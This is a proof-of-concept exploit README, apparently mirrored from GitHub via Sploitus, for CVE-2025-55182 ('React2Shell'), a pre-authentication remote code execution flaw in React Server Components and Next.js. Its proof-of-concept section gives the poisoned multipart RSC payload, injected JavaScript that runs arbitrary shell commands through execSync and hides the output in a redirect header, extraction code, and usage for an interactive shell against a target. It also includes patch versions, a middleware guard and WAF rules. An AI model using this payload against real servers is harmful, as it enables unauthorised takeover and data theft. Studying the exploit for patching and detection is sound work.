## https://sploitus.com/exploit?id=DD6A7006-1ABB-5831-85A6-A88F30A724CC
# CVE-2025-55182 โ React Server Components Pre-Auth RCE ("React2Shell")
> **Alias:** React2Shell
> **Severity:** Critical โ CVSS **10.0** (NVD)
> **Companion advisory:** CVE-2025-66478 (Next.js-specific)
> **Type:** Remote Code Execution โ Pre-Authentication
> **Root component:** React Server Components "Flight" protocol parser (`react-server-dom-*`)
> **Disclosed:** December 3, 2025 โ patches available same day
> **Discoverer:** Lachlan Davidson (responsibly disclosed to React/Vercel teams)
> **Exploitation status:** Active in-the-wild exploitation observed from December 5, 2025
---
## โ ๏ธ Important notice
Patches for this vulnerability have been **publicly available since December 3, 2025**.
This repository exists for educational and research purposes: understanding the mechanics helps defenders detect and remediate faster.
Active exploitation has been observed by Wiz Research, Amazon Threat Intelligence, Datadog, and Unit 42.
**If you are a system owner, patch immediately โ do not test against production.**
---
## Table of Contents
- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Affected Versions](#affected-versions)
- [Proof of Concept](#proof-of-concept)
- [How It Works](#how-it-works)
- [Remediation](#remediation)
- [Disclosure Timeline](#disclosure-timeline)
- [References](#references)
- [Disclaimer](#disclaimer)
---
## Overview
CVE-2025-55182 / CVE-2025-66478 is a **pre-authentication Remote Code Execution** vulnerability in the React 19 ecosystem. It affects any application using React Server Components with the App Router โ including standard Next.js deployments created with `create-next-app` with no additional configuration.
The vulnerability abuses the RSC "Flight" wire protocol: an attacker sends a crafted `multipart/form-data` POST request that injects arbitrary JavaScript into the RSC parser's `_prefix` field. Because this field is evaluated server-side **before any authentication check**, full OS command execution is achieved with zero credentials.
Command output is exfiltrated **without a reverse shell or callback server** โ it travels back inside the `x-action-redirect` response header as Base64, making it firewall-friendly and difficult to detect via egress monitoring alone.
---
## Vulnerability Details
### Root Cause
The RSC response parser (`react-server-dom-webpack`, `react-server-dom-turbopack`, etc.) deserialises the `_prefix` field of an incoming RSC chunk as executable JavaScript **without sanitisation and without an authentication gate**. Three primitives are chained:
```
1. __proto__ pollution
"then": "$1:__proto__:then"
โ hijacks Promise resolution in the RSC runtime
2. Function constructor access
"_formData": {"get": "$1:constructor:constructor"}
โ walks the prototype chain to reach the global Function() constructor
3. NEXT_REDIRECT throw
throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `...;/out?a=${output};307;`})
โ Next.js catches this internally and emits a 303 whose x-action-redirect header
carries the attacker-controlled value verbatim
```
### Why it requires no authentication
Server Actions are dispatched by the presence of the `Next-Action` request header. The framework validates the header format but does **not** enforce session or authentication before deserialising the RSC payload โ the exploit fires at the protocol layer, before any application middleware runs.
### Output channel
```javascript
throw Object.assign(new Error('NEXT_REDIRECT'), {
digest: `NEXT_REDIRECT;push;/out?a=${base64_output};307;`
});
```
Next.js catches the throw and emits:
```
HTTP/1.1 303 See Other
x-action-redirect: /out?a=;push
```
The attacker reads stdout from the response header directly. No open port, no DNS callback, no egress beyond the initial HTTP connection.
---
## Affected Versions
### Next.js (CVE-2025-66478)
| Affected range | Patched version |
|---|---|
| 15.0.0 โ 15.0.4 | **15.0.5** |
| 15.1.0 โ 15.1.8 | **15.1.9** |
| 15.2.0 โ 15.2.5 | **15.2.6** |
| 15.3.0 โ 15.3.5 | **15.3.6** |
| 15.4.0 โ 15.4.7 | **15.4.8** |
| 15.5.0 โ 15.5.6 | **15.5.7** |
| 16.0.0 โ 16.0.6 | **16.0.7** |
| 14.3.0-canary.77+ | downgrade to `next@14` stable |
### React (CVE-2025-55182)
| Affected | Patched |
|---|---|
| `react-server-dom-*` 19.0, 19.1.0, 19.1.1, 19.2.0 | **19.0.3 / 19.1.4 / 19.2.3** |
### Other affected frameworks
React Router, Waku, RedwoodSDK, `@parcel/rsc`, `@vitejs/plugin-rsc` โ any library bundling `react-server-dom-*`.
**Required conditions:**
- App Router enabled (RSC in use)
- Node.js runtime โ not Edge (`child_process` unavailable in Edge)
- No extra developer configuration needed: default `create-next-app` is vulnerable
---
## Proof of Concept
### Install
```bash
git clone https://github.com/lvx9101-ux/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt
```
### Usage
```bash
# Single command
python3 cve-2025-55182.py -u http://TARGET:3000 -c "id"
# Interactive pseudo-shell
python3 cve-2025-55182.py -u http://TARGET:3000 --shell
# Custom Host header (vhost routing)
python3 cve-2025-55182.py -u http://TARGET:3000 -c "id" --host-header app.internal
# Verbose โ print raw HTTP status + response headers
python3 cve-2025-55182.py -u http://TARGET:3000 -c "id" -v
```
### Expected output
```
$ python3 cve-2025-55182.py -u http://TARGET:3000 --shell
โโโโโโโโโโ โโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโโ
โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ
โโโ โโโโ โโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโ โโโโโ โโโโโโโโ โโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโ
CVE-2025-55182 | Next.js
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
```
**Part `0` โ the poisoned RSC chunk:**
```json
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "",
"_chunks": "$Q2",
"_formData": {"get": "$1:constructor:constructor"}
}
}
```
**Part `1`** โ `"$@0"` โ back-reference that triggers evaluation of Part 0.
**Part `2`** โ `[]` โ empty array to satisfy the RSC argument shape.
### Step 2 โ Injected JavaScript
```javascript
var res = Buffer.from(
process.mainModule.require('child_process').execSync(``)
).toString('base64');
throw Object.assign(new Error('NEXT_REDIRECT'), {
digest: `NEXT_REDIRECT;push;/out?a=${res};307;`
});
```
`execSync` runs synchronously โ full stdout is captured before the throw.
`Buffer.toString('base64')` encodes output so it survives URL encoding in the header value.
### Step 3 โ Extraction
```python
for hdr in ("x-action-redirect", "Location"):
val = r.headers.get(hdr, "")
match = re.search(r'\?a=(.+?)(?:;|$)', val)
if match:
return True, unquote(match.group(1))
```
The Base64 value is decoded and printed as plaintext.
---
## Remediation
### 1 โ Update immediately
```bash
# Pick the patched version for your release line
npm install next@15.0.5 # 15.0.x
npm install next@15.1.9 # 15.1.x
npm install next@15.2.6 # 15.2.x
npm install next@15.3.6 # 15.3.x
npm install next@15.4.8 # 15.4.x
npm install next@15.5.7 # 15.5.x
npm install next@16.0.7 # 16.0.x
npm install next@14 # canary โ downgrade to stable 14.x
# Or use the official interactive tool
npx fix-react2shell-next
```
### 2 โ Middleware authentication guard
```typescript
// middleware.ts
import { NextRequest, NextResponse } from 'next/server';
export function middleware(request: NextRequest) {
const isServerAction = request.headers.has('Next-Action');
const hasSession = request.cookies.has('session');
if (isServerAction && !hasSession) {
return new Response('Unauthorized', { status: 401 });
}
return NextResponse.next();
}
export const config = {
matcher: ['/((?!_next/static|_next/image|favicon.ico).*)'],
};
```
> Defence-in-depth only โ **upgrading is mandatory, there is no workaround that avoids patching.**
### 3 โ WAF rule (ModSecurity / OWASP CRS)
```nginx
SecRule REQUEST_BODY "@contains __proto__" "id:9001,phase:2,deny,status:400"
SecRule REQUEST_BODY "@contains constructor" "id:9002,phase:2,deny,status:400"
SecRule REQUEST_BODY "@contains NEXT_REDIRECT" "id:9003,phase:2,deny,status:400"
```
### 4 โ Rotate secrets after patching
After patching and redeploying, rotate all application secrets โ exploitation leaves no guaranteed trace in application logs.
---
## Disclosure Timeline
| Date | Event |
|---|---|
| Pre-disclosure | Lachlan Davidson discovers the vulnerability and reports it responsibly to the React / Vercel security teams |
| **Dec 3, 2025** | React publishes CVE-2025-55182; Next.js publishes CVE-2025-66478; patches shipped to npm |
| **Dec 4, 2025** | Public exploit code appears; Vercel deploys WAF rules globally |
| **Dec 5, 2025** | Active in-the-wild exploitation observed (Wiz, Amazon, Datadog, Unit 42) |
| **Dec 10โ15, 2025** | Post-exploitation activity: cloud credential harvesting, cryptocurrency mining |
| **Dec 11, 2025** | Follow-up Next.js security update for CVE-2025-55183 and CVE-2025-55184 |
---
## References
- [React official advisory โ CVE-2025-55182](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [Next.js advisory โ CVE-2025-66478](https://nextjs.org/blog/CVE-2025-66478)
- [Vercel React2Shell security bulletin](https://vercel.com/kb/bulletin/react2shell)
- [Wiz Research โ React2Shell technical analysis](https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182)
- [Microsoft Security Blog โ defending against React2Shell](https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components)
- [Trend Micro โ PoC landscape and in-the-wild analysis](https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html)
- [Unit 42 โ exploitation activity](https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/)
- [NVD entry โ CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Prototype pollution โ PortSwigger Web Security Academy](https://portswigger.net/web-security/prototype-pollution)
---
## Disclaimer
This repository is published strictly for **educational and research purposes**.
- Patches have been publicly available since **December 3, 2025**. This vulnerability is fully patched, publicly documented, and has been actively exploited in the wild โ this PoC does not disclose any new information.
- Do **not** use this tool against any system you do not own or have **explicit written authorisation** to test.
- The author assumes **no liability** for any misuse of this material.
- Unauthorised use may violate the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation in your jurisdiction.